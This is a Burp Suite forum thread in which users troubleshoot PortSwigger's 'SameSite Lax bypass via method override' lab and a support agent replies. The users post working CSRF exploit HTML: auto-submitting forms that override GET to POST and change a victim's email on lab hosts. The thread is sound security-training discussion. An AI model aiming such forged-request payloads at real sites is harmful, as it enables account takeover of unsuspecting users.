Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab: SameSite Lax bypass via method override

Bora | Last updated: Jul 08, 2024 12:57PM UTC

When I click on "View Exploit" it changes my email. After that I change the email and click on deliver exploit to victim but it doesn't solve my lab. <http> <body> <form method="GET" action="https://0a92003804a9626c8024c11a001a0099.web-security-academy.net/my-account/change-email"> <input type="hidden" name="_method" value="POST"> <input type="hidden" name="email" value="haydari@gmail.com"> <script> document.forms[0].submit(); </script> </body> </http>

Ben, PortSwigger Agent | Last updated: Jul 09, 2024 07:27AM UTC

Hi Bora, Your exploit appears to successfully solve this particular when I use it - are you still having issues with this as of right now?

J | Last updated: Jul 21, 2024 10:32AM UTC

Hey, I to am experiencing trouble solving the lab. Am using the following payload: <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://0a3100fd0339eaf885d976d8006500c4.web-security-academy.net/my-account/change-email" method="GET"> <input type="hidden" name="_method" value="POST"> <input type="hidden" name="email" value="test20&#64;test&#46;com" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> Despite succeeding when clicking view exploit, after clicking "Store" followed by "Deliver..." the lab is not solved. I have tried via Burpsuite's browser and Google Chrome. Would appreciate any feedback, Thanks

Ben, PortSwigger Agent | Last updated: Jul 22, 2024 12:04PM UTC

Hi, Just to clarify, you are still looking at the 'SameSite Lax bypass via method override' lab? If so, have you tried using the written solution for this?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.